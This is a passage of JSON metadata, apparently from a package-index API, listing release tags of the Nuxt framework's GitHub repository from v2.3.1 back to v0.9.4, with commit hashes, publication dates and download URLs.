:"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg: